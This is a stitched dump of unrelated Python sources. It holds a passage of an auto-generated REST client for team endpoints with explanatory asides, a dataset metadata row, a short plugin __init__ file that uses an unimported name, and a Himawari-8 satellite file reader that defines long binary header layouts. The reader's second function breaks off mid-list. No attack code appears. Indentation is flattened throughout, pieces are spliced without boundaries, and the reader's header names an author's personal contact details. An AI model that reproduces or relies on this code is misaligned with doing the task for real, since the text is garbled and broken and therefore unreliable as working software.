If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_teams" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Team]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
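Every `*_with_http_info` method above repeats the same idiom: snapshot `locals()` before any other local variable is defined, fold `**kwargs` into the snapshot, and reject unknown keys. A minimal standalone sketch of that pattern — the `demo_method`/`_collect_params` names are illustrative, not part of the generated client:

```python
def _collect_params(local_var_params, allowed, method_name):
    """Merge **kwargs into a locals() snapshot, rejecting unknown keys."""
    for key, val in local_var_params['kwargs'].items():
        if key not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method %s" % (key, method_name)
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    return local_var_params


def demo_method(team_id, **kwargs):
    # Snapshot first, so no helper variables leak into the params dict.
    local_var_params = locals()
    allowed = ['team_id', 'async_req', '_request_timeout']
    return _collect_params(local_var_params, allowed, 'demo_method')


params = demo_method('ops-team', async_req=True)
print(sorted(params))   # ['async_req', 'team_id']
```

The generated code raises `ApiTypeError` instead of `TypeError`, but the control flow is the same.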
def permit_team_user(self, team_id, team_user, **kwargs): # noqa: E501
"""Update user perms for team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.permit_team_user(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to update (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.permit_team_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
else:
(data) = self.permit_team_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
return data
def permit_team_user_with_http_info(self, team_id, team_user, **kwargs): # noqa: E501
"""Update user perms for team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.permit_team_user_with_http_info(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to update (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id', 'team_user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method permit_team_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `permit_team_user`") # noqa: E501
# verify the required parameter 'team_user' is set
if ('team_user' not in local_var_params or
local_var_params['team_user'] is None):
raise ApiValueError("Missing the required parameter `team_user` when calling `permit_team_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'team_user' in local_var_params:
body_params = local_var_params['team_user']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}/users', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GeneralError', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def show_team(self, team_id, **kwargs): # noqa: E501
"""Fetch a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.show_team(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.show_team_with_http_info(team_id, **kwargs) # noqa: E501
else:
(data) = self.show_team_with_http_info(team_id, **kwargs) # noqa: E501
return data
def show_team_with_http_info(self, team_id, **kwargs): # noqa: E501
"""Fetch a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.show_team_with_http_info(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method show_team" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `show_team`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Team', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_team(self, team_id, team, **kwargs): # noqa: E501
"""Update a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_team(team_id, team, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param Team team: The team data to update (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_team_with_http_info(team_id, team, **kwargs) # noqa: E501
else:
(data) = self.update_team_with_http_info(team_id, team, **kwargs) # noqa: E501
return data
def update_team_with_http_info(self, team_id, team, **kwargs): # noqa: E501
"""Update a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_team_with_http_info(team_id, team, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param Team team: The team data to update (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id', 'team'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_team" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `update_team`") # noqa: E501
# verify the required parameter 'team' is set
if ('team' not in local_var_params or
local_var_params['team'] is None):
raise ApiValueError("Missing the required parameter `team` when calling `update_team`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'team' in local_var_params:
body_params = local_var_params['team']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Team', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
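Each public wrapper above either calls its `_with_http_info` twin synchronously or, with `async_req=True`, hands back a handle whose `.get()` blocks for the result. A toy model of that dispatch — `MiniApi` is illustrative; OpenAPI-generated Python clients typically back this with a `multiprocessing.pool.ThreadPool` inside `ApiClient`:

```python
from multiprocessing.pool import ThreadPool


class MiniApi:
    """Illustrative sync/async dispatch in the style of the client above."""

    def __init__(self):
        self._pool = ThreadPool(1)

    def list_teams(self, **kwargs):
        if kwargs.pop('async_req', False):
            # Async path: return an AsyncResult; the caller uses .get().
            return self._pool.apply_async(self._list_teams_impl)
        return self._list_teams_impl()

    def _list_teams_impl(self):
        return ['platform', 'data']   # stand-in for the HTTP round trip


api = MiniApi()
sync_result = api.list_teams()             # synchronous call
thread = api.list_teams(async_req=True)    # asynchronous call
async_result = thread.get()                # block until the worker finishes
print(sync_result == async_result)         # True
```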
30b323a7587c1391bdabfbd9a30d3c6c9b4bc210 | 218 | py | Python | mupf/client/__init__.py | kimbar/mupf_project | 21de9ed94f604220f8b8dcc64d45e30a0b94d2a1 | ["MIT"] | null | null | null | mupf/client/__init__.py | kimbar/mupf_project | 21de9ed94f604220f8b8dcc64d45e30a0b94d2a1 | ["MIT"] | 44 | 2019-06-14T03:43:43.000Z | 2020-12-27T19:17:15.000Z | mupf/client/__init__.py | kimbar/mupf_project | 21de9ed94f604220f8b8dcc64d45e30a0b94d2a1 | ["MIT"] | null | null | null |
from ._webbrowser import WebBrowser
from .._plugins_manager import inject, iterate_by_supclass
inject(__name__, globals(), iterate_by_supclass, class_=Client)
del iterate_by_supclass, inject
| 31.142857 | 63 | 0.83945 | 29 | 218 | 5.793103 | 0.517241 | 0.160714 | 0.303571 | 0.27381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09633 | 218 | 6 | 64 | 36.333333 | 0.852792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
30c4a533ac2d47e45adbdaa9b0b84786cfb5fd43 | 35545 | py | Python | readahi8fulldisk_vis.py | YuchenGUOGYC/Himawari-8_data_process | dd3c57ca15c53bdcc21f590fdadce6bd2bb840da | ["MIT"] | null | null | null | readahi8fulldisk_vis.py | YuchenGUOGYC/Himawari-8_data_process | dd3c57ca15c53bdcc21f590fdadce6bd2bb840da | ["MIT"] | null | null | null | readahi8fulldisk_vis.py | YuchenGUOGYC/Himawari-8_data_process | dd3c57ca15c53bdcc21f590fdadce6bd2bb840da | ["MIT"] | null | null | null |
"""
Created on Thu Jul 9 09:31:28 2020
@author: guoyuchen
@e-mail:guoyc1994@163.com
@tel: 15801369263
"""
import numpy as np
def read_Himawari(inputfile):
    """Read a Himawari-8 HSD segment file and return its raw count array."""
    resolution = int(inputfile[-12])
    if resolution == 1:      # 1.0 km band: 1100 x 11000 pixels per segment
        res = 12100000
        nlin = 1100
        ncol = 11000
    elif resolution == 2:    # 2.0 km band: 550 x 5500 pixels per segment
        res = 3025000
        nlin = 550
        ncol = 5500
    else:                    # 0.5 km band: 2200 x 22000 pixels per segment
        res = 48400000
        nlin = 2200
        ncol = 22000
    band = int(inputfile[-21:-19])
if band < 7:
formation = [('Block number1', 'i1', 1), \
('Block length1', 'i2', 1), \
('Total number of header blocks ', 'i2', 1), \
('Byte order', 'i1', 1), \
('Satellite name', 'S1', 16), \
('Processing center name', 'S1', 16), \
('Observation area', 'S1', 4), \
('Other observation information', 'S1', 2), \
('Observation timeline', 'i2', 1), \
('Observation start time', 'float64', 1), \
('Observation end time', 'float64', 1), \
('File creation time', 'float64', 1), \
('Total header length', 'i4', 1), \
('Total data length', 'i4', 1), \
('Quality flag 1', 'i1', 1), \
('Quality flag 2 ', 'i1', 1), \
('Quality flag 3', 'i1', 1), \
('Quality flag 4', 'i1', 1), \
('File format version', 'S1', 32), \
('File name ', 'S1', 128), \
('Spare1', 'S1', 40), \
('Block number2', 'i1', 1), \
('Block length2', 'i2', 1), \
('Number of bits per pixel', 'i2', 1), \
('Number of columns', 'i2', 1), \
('Number of lines', 'i2', 1), \
('Compression flag for data', 'i1', 1), \
('Spare2', 'S1', 40), \
('Block number3', 'i1', 1), \
('Block length3', 'i2', 1), \
('sub_lon', 'float64', 1), \
('Column scaling factor', 'i4', 1), \
('Line scaling factor', 'i4', 1), \
('Column offset', 'float32', 1), \
('Line offset', 'float32', 1), \
('Distance from Earth’s center to virtual satellite', 'float64', 1), \
('Earth’s equatorial radius', 'float64', 1), \
('Earth’s polar radius', 'float64', 1), \
('var1', 'float64', 1), \
('var2', 'float64', 1), \
('var3', 'float64', 1), \
('Coefficient for sd', 'float64', 1), \
('Resampling types', 'i2', 1), \
('Resampling size', 'i2', 1), \
('Spare3', 'S1', 40), \
('Block number4', 'i1', 1), \
('Block length4', 'i2', 1), \
('Navigation information time', 'float64', 1), \
('SSP longitude', 'float64', 1), \
('SSP latitude', 'float64', 1), \
('Distance from Earth’s center to Satellite', 'float64', 1), \
('Nadir longitude', 'float64', 1), \
('Nadir latitude', 'float64', 1), \
('Sun’s position', 'float64', 3), \
('Moon’s position', 'float64', 3), \
('Spare4', 'S1', 40), \
('Block number5', 'i1', 1), \
('Block length5', 'i2', 1), \
('Band number', 'i2', 1), \
('Central wave length', 'float64', 1), \
('Valid number of bits per pixel', 'i2', 1), \
('Count value of error pixels', 'uint16', 1), \
('Count value of pixels outside scan area', 'uint16', 1), \
('Slope for count-radiance conversion equation ', 'float64', 1), \
('Intercept for count-radiance conversion equation', 'float64', 1), \
('Coefficient for transformation from radiance to albedo', 'float64', 1), \
('Update time of the values of the following No. 12 and No. 13', 'float64', 1), \
('Calibrated Slope for count-radiance conversion equation_updated value of No. 8 of this block ', 'float64', 1),\
('Calibrated Intercept for count-radiance conversion equation_updated value of No. 9 of this block ', 'float64', 1),\
('Spare5', 'S1', 80), \
('Block number6', 'i1', 1), \
('Block length6', 'i2', 1), \
('GSICS calibration coefficient_Intercept', 'float64', 1), \
('GSICS calibration coefficient_Slope', 'float64', 1), \
('GSICS calibration coefficient_Quadratic term', 'float64', 1), \
('Radiance bias for standard scene', 'float64', 1), \
('Uncertainty of radiance bias for standard scene', 'float64', 1), \
('Radiance for standard scene', 'float64', 1), \
('Start time of GSICS Correction validity period', 'float64', 1), \
('End time of GSICS Correction validity period', 'float64', 1), \
('Radiance validity range of GSICS calibration coefficients_upper limit', 'float32', 1), \
('Radiance validity range of GSICS calibration coefficients_lower limit', 'float32', 1), \
('File name of GSICS Correction', 'S1', 128), \
('Spare6', 'S1', 56), \
('Block number7', 'i1', 1), \
('Block length7', 'i2', 1), \
('Total number of segments', 'i1', 1), \
('Segment sequence number', 'i1', 1), \
('First line number of image segment', 'i2', 1), \
('Spare7', 'S1', 40), \
('Block number8', 'i1', 1), \
('Block length8', 'i2', 1), \
('Center column of rotation', 'float32', 1), \
('Center line of rotation', 'float32', 1), \
('Amount of rotational correction', 'float64', 1), \
('Number of correction information data for column and line direction', 'i2', 1), \
('Line number after rotation', 'i2', 1), \
('Shift amount for column direction', 'float32', 1), \
('Shift amount for line direction8', 'float32', 1), \
('Spare8', 'S1', 50), \
('Block number9', 'i1', 1), \
('Block length9', 'i2', 1), \
('Number of observation times9', 'i2', 1), \
('Line number9', 'i2', 1), \
('Observation time9', 'float64', 1), \
('Spare9', 'S1', 70), \
('Block number10', 'i1', 1), \
('Block length10', 'i4', 1), \
('Number of error information data', 'i2', 1), \
('Line number10', 'i2', 1), \
('Number of error pixels per line10', 'i2', 1), \
('Spare10', 'S1', 36), \
('Block number11', 'i1', 1), \
('Block length11', 'i2', 1), \
('Spare11', 'S1', 256), \
('Count value of each pixel', 'i2', res)]
else:
formation=[('Block number1','i1',1),\
('Block length1','i2',1),\
('Total number of header blocks ','i2',1),\
('Byte order','i1',1),\
('Satellite name','S1',16),\
('Processing center name','S1',16),\
('Observation area','S1',4),\
('Other observation information','S1',2),\
('Observation timeline','i2',1),\
('Observation start time','float64',1),\
('Observation end time','float64',1),\
('File creation time','float64',1),\
('Total header length','i4',1),\
('Total data length','i4',1),\
('Quality flag 1','i1',1),\
('Quality flag 2 ','i1',1),\
('Quality flag 3','i1',1),\
('Quality flag 4','i1',1),\
('File format version','S1',32),\
('File name ','S1',128),\
('Spare1','S1',40),\
('Block number2','i1',1),\
('Block length2','i2',1),\
('Number of bits per pixel','i2',1),\
('Number of columns','i2',1),\
('Number of lines','i2',1),\
('Compression flag for data','i1',1),\
('Spare2','S1',40),\
('Block number3','i1',1),\
('Block length3','i2',1),\
('sub_lon','float64',1),\
('Column scaling factor','i4',1),\
('Line scaling factor','i4',1),\
('Column offset','float32',1),\
('Line offset','float32',1),\
('Distance from Earth’s center to virtual satellite','float64',1),\
('Earth’s equatorial radius','float64',1),\
('Earth’s polar radius','float64',1),\
('var1','float64',1),\
('var2','float64',1),\
('var3','float64',1),\
('Coefficient for sd','float64',1),\
('Resampling types','i2',1),\
('Resampling size','i2',1),\
('Spare3','S1',40),\
('Block number4','i1',1),\
('Block length4','i2',1),\
('Navigation information time','float64',1),\
('SSP longitude','float64',1),\
('SSP latitude','float64',1),\
('Distance from Earth’s center to Satellite','float64',1),\
('Nadir longitude','float64',1),\
('Nadir latitude','float64',1),\
('Sun’s position','float64',3),\
('Moon’s position','float64',3),\
('Spare4','S1',40),\
('Block number5','i1',1),\
('Block length5','i2',1),\
('Band number','i2',1),\
('Central wave length','float64',1),\
('Valid number of bits per pixel','i2',1),\
                   ('Count value of error pixels','uint16',1),\
                   ('Count value of pixels outside scan area','uint16',1),\
('Slope for count-radiance conversion equation ','float64',1),\
('Intercept for count-radiance conversion equation','float64',1),\
('radiance to brightness temperature_c0','float64',1),\
('radiance to brightness temperature_c1','float64',1),\
('radiance to brightness temperature_c2','float64',1),\
('brightness temperature to radiance_C0','float64',1),\
('brightness temperature to radianceC1','float64',1),\
('brightness temperature to radianceC2','float64',1),\
('Speed of light','float64',1),\
('Planck constant','float64',1),\
('Boltzmann constant','float64',1),\
('Spare5','S1',40), \
('Block number6', 'i1', 1), \
('Block length6', 'i2', 1), \
('GSICS calibration coefficient_Intercept', 'float64', 1), \
('GSICS calibration coefficient_Slope', 'float64', 1), \
('GSICS calibration coefficient_Quadratic term', 'float64', 1), \
('Radiance bias for standard scene', 'float64', 1), \
('Uncertainty of radiance bias for standard scene', 'float64', 1), \
('Radiance for standard scene', 'float64', 1), \
('Start time of GSICS Correction validity period', 'float64', 1), \
('End time of GSICS Correction validity period', 'float64', 1), \
('Radiance validity range of GSICS calibration coefficients_upper limit', 'float32', 1), \
('Radiance validity range of GSICS calibration coefficients_lower limit', 'float32', 1), \
('File name of GSICS Correction', 'S1', 128), \
('Spare6', 'S1', 56), \
('Block number7', 'i1', 1), \
('Block length7', 'i2', 1), \
('Total number of segments', 'i1', 1), \
('Segment sequence number', 'i1', 1), \
('First line number of image segment', 'i2', 1), \
('Spare7', 'S1', 40), \
('Block number8', 'i1', 1), \
('Block length8', 'i2', 1), \
('Center column of rotation', 'float32', 1), \
('Center line of rotation', 'float32', 1), \
('Amount of rotational correction', 'float64', 1), \
('Number of correction information data for column and line direction', 'i2', 1), \
('Line number after rotation', 'i2', 1), \
('Shift amount for column direction', 'float32', 1), \
('Shift amount for line direction8', 'float32', 1), \
('Spare8', 'S1', 50), \
('Block number9', 'i1', 1), \
('Block length9', 'i2', 1), \
('Number of observation times9', 'i2', 1), \
('Line number9', 'i2', 1), \
('Observation time9', 'float64', 1), \
('Spare9', 'S1', 70), \
('Block number10', 'i1', 1), \
('Block length10', 'i4', 1), \
('Number of error information data', 'i2', 1), \
('Line number10', 'i2', 1), \
('Number of error pixels per line10', 'i2', 1), \
('Spare10', 'S1', 36), \
('Block number11', 'i1', 1), \
('Block length11', 'i2', 1), \
('Spare11', 'S1', 256), \
('Count value of each pixel', 'i2', res)]
    data = np.fromfile(inputfile, dtype=formation)
    band = data['Count value of each pixel'].reshape(nlin, ncol)
    return band


def read_Himawari_info(inputfile):
    # resolution digit after 'R' in the file name: 1 -> R10 (1 km), 2 -> R20 (2 km), else R05 (0.5 km)
    resolution = int(inputfile[-12])
    if resolution == 1:
        res = 12100000
    elif resolution == 2:
        res = 3025000
    else:
        res = 48400000
    band = int(inputfile[-21:-19])
    if band < 7:
        formation = [('Block number1', 'i1', 1), \
formation = [('Block number1', 'i1', 1), \
('Block length1', 'i2', 1), \
('Total number of header blocks ', 'i2', 1), \
('Byte order', 'i1', 1), \
('Satellite name', 'S1', 16), \
('Processing center name', 'S1', 16), \
('Observation area', 'S1', 4), \
('Other observation information', 'S1', 2), \
('Observation timeline', 'i2', 1), \
('Observation start time', 'float64', 1), \
('Observation end time', 'float64', 1), \
('File creation time', 'float64', 1), \
('Total header length', 'i4', 1), \
('Total data length', 'i4', 1), \
('Quality flag 1', 'i1', 1), \
('Quality flag 2 ', 'i1', 1), \
('Quality flag 3', 'i1', 1), \
('Quality flag 4', 'i1', 1), \
('File format version', 'S1', 32), \
('File name ', 'S1', 128), \
('Spare1', 'S1', 40), \
('Block number2', 'i1', 1), \
('Block length2', 'i2', 1), \
('Number of bits per pixel', 'i2', 1), \
('Number of columns', 'i2', 1), \
('Number of lines', 'i2', 1), \
('Compression flag for data', 'i1', 1), \
('Spare2', 'S1', 40), \
('Block number3', 'i1', 1), \
('Block length3', 'i2', 1), \
('sub_lon', 'float64', 1), \
('Column scaling factor', 'i4', 1), \
('Line scaling factor', 'i4', 1), \
('Column offset', 'float32', 1), \
('Line offset', 'float32', 1), \
('Distance from Earth’s center to virtual satellite', 'float64', 1), \
('Earth’s equatorial radius', 'float64', 1), \
('Earth’s polar radius', 'float64', 1), \
('var1', 'float64', 1), \
('var2', 'float64', 1), \
('var3', 'float64', 1), \
('Coefficient for sd', 'float64', 1), \
('Resampling types', 'i2', 1), \
('Resampling size', 'i2', 1), \
('Spare3', 'S1', 40), \
('Block number4', 'i1', 1), \
('Block length4', 'i2', 1), \
('Navigation information time', 'float64', 1), \
('SSP longitude', 'float64', 1), \
('SSP latitude', 'float64', 1), \
('Distance from Earth’s center to Satellite', 'float64', 1), \
('Nadir longitude', 'float64', 1), \
('Nadir latitude', 'float64', 1), \
('Sun’s position', 'float64', 3), \
('Moon’s position', 'float64', 3), \
('Spare4', 'S1', 40), \
('Block number5', 'i1', 1), \
('Block length5', 'i2', 1), \
('Band number', 'i2', 1), \
('Central wave length', 'float64', 1), \
('Valid number of bits per pixel', 'i2', 1), \
('Count value of error pixels', 'uint16', 1), \
('Count value of pixels outside scan area', 'uint16', 1), \
('Slope for count-radiance conversion equation ', 'float64', 1), \
('Intercept for count-radiance conversion equation', 'float64', 1), \
('Coefficient for transformation from radiance to albedo', 'float64', 1), \
('Update time of the values of the following No. 12 and No. 13', 'float64', 1), \
('Calibrated Slope for count-radiance conversion equation_updated value of No. 8 of this block ', 'float64', 1),\
('Calibrated Intercept for count-radiance conversion equation_updated value of No. 9 of this block ', 'float64', 1),\
('Spare5', 'S1', 80), \
('Block number6', 'i1', 1), \
('Block length6', 'i2', 1), \
('GSICS calibration coefficient_Intercept', 'float64', 1), \
('GSICS calibration coefficient_Slope', 'float64', 1), \
('GSICS calibration coefficient_Quadratic term', 'float64', 1), \
('Radiance bias for standard scene', 'float64', 1), \
('Uncertainty of radiance bias for standard scene', 'float64', 1), \
('Radiance for standard scene', 'float64', 1), \
('Start time of GSICS Correction validity period', 'float64', 1), \
('End time of GSICS Correction validity period', 'float64', 1), \
('Radiance validity range of GSICS calibration coefficients_upper limit', 'float32', 1), \
('Radiance validity range of GSICS calibration coefficients_lower limit', 'float32', 1), \
('File name of GSICS Correction', 'S1', 128), \
('Spare6', 'S1', 56), \
('Block number7', 'i1', 1), \
('Block length7', 'i2', 1), \
('Total number of segments', 'i1', 1), \
('Segment sequence number', 'i1', 1), \
('First line number of image segment', 'i2', 1), \
('Spare7', 'S1', 40), \
('Block number8', 'i1', 1), \
('Block length8', 'i2', 1), \
('Center column of rotation', 'float32', 1), \
('Center line of rotation', 'float32', 1), \
('Amount of rotational correction', 'float64', 1), \
('Number of correction information data for column and line direction', 'i2', 1), \
('Line number after rotation', 'i2', 1), \
('Shift amount for column direction', 'float32', 1), \
('Shift amount for line direction8', 'float32', 1), \
('Spare8', 'S1', 50), \
('Block number9', 'i1', 1), \
('Block length9', 'i2', 1), \
('Number of observation times9', 'i2', 1), \
('Line number9', 'i2', 1), \
('Observation time9', 'float64', 1), \
('Spare9', 'S1', 70), \
('Block number10', 'i1', 1), \
('Block length10', 'i4', 1), \
('Number of error information data', 'i2', 1), \
('Line number10', 'i2', 1), \
('Number of error pixels per line10', 'i2', 1), \
('Spare10', 'S1', 36), \
('Block number11', 'i1', 1), \
('Block length11', 'i2', 1), \
('Spare11', 'S1', 256), \
('Count value of each pixel', 'i2', res)]
    else:
        formation = [('Block number1', 'i1', 1), \
('Block length1','i2',1),\
('Total number of header blocks ','i2',1),\
('Byte order','i1',1),\
('Satellite name','S1',16),\
('Processing center name','S1',16),\
('Observation area','S1',4),\
('Other observation information','S1',2),\
('Observation timeline','i2',1),\
('Observation start time','float64',1),\
('Observation end time','float64',1),\
('File creation time','float64',1),\
('Total header length','i4',1),\
('Total data length','i4',1),\
('Quality flag 1','i1',1),\
('Quality flag 2 ','i1',1),\
('Quality flag 3','i1',1),\
('Quality flag 4','i1',1),\
('File format version','S1',32),\
('File name ','S1',128),\
('Spare1','S1',40),\
('Block number2','i1',1),\
('Block length2','i2',1),\
('Number of bits per pixel','i2',1),\
('Number of columns','i2',1),\
('Number of lines','i2',1),\
('Compression flag for data','i1',1),\
('Spare2','S1',40),\
('Block number3','i1',1),\
('Block length3','i2',1),\
('sub_lon','float64',1),\
('Column scaling factor','i4',1),\
('Line scaling factor','i4',1),\
('Column offset','float32',1),\
('Line offset','float32',1),\
('Distance from Earth’s center to virtual satellite','float64',1),\
('Earth’s equatorial radius','float64',1),\
('Earth’s polar radius','float64',1),\
('var1','float64',1),\
('var2','float64',1),\
('var3','float64',1),\
('Coefficient for sd','float64',1),\
('Resampling types','i2',1),\
('Resampling size','i2',1),\
('Spare3','S1',40),\
('Block number4','i1',1),\
('Block length4','i2',1),\
('Navigation information time','float64',1),\
('SSP longitude','float64',1),\
('SSP latitude','float64',1),\
('Distance from Earth’s center to Satellite','float64',1),\
('Nadir longitude','float64',1),\
('Nadir latitude','float64',1),\
('Sun’s position','float64',3),\
('Moon’s position','float64',3),\
('Spare4','S1',40),\
('Block number5','i1',1),\
('Block length5','i2',1),\
('Band number','i2',1),\
('Central wave length','float64',1),\
('Valid number of bits per pixel','i2',1),\
('Count value of error pixels','i2',1),\
('Count value of pixels outside scan area','i2',1),\
('Slope for count-radiance conversion equation ','float64',1),\
('Intercept for count-radiance conversion equation','float64',1),\
('radiance to brightness temperature_c0','float64',1),\
('radiance to brightness temperature_c1','float64',1),\
('radiance to brightness temperature_c2','float64',1),\
('brightness temperature to radiance_C0','float64',1),\
('brightness temperature to radianceC1','float64',1),\
('brightness temperature to radianceC2','float64',1),\
('Speed of light','float64',1),\
('Planck constant','float64',1),\
('Boltzmann constant','float64',1),\
('Spare5','S1',40), \
('Block number6', 'i1', 1), \
('Block length6', 'i2', 1), \
('GSICS calibration coefficient_Intercept', 'float64', 1), \
('GSICS calibration coefficient_Slope', 'float64', 1), \
('GSICS calibration coefficient_Quadratic term', 'float64', 1), \
('Radiance bias for standard scene', 'float64', 1), \
('Uncertainty of radiance bias for standard scene', 'float64', 1), \
('Radiance for standard scene', 'float64', 1), \
('Start time of GSICS Correction validity period', 'float64', 1), \
('End time of GSICS Correction validity period', 'float64', 1), \
('Radiance validity range of GSICS calibration coefficients_upper limit', 'float32', 1), \
('Radiance validity range of GSICS calibration coefficients_lower limit', 'float32', 1), \
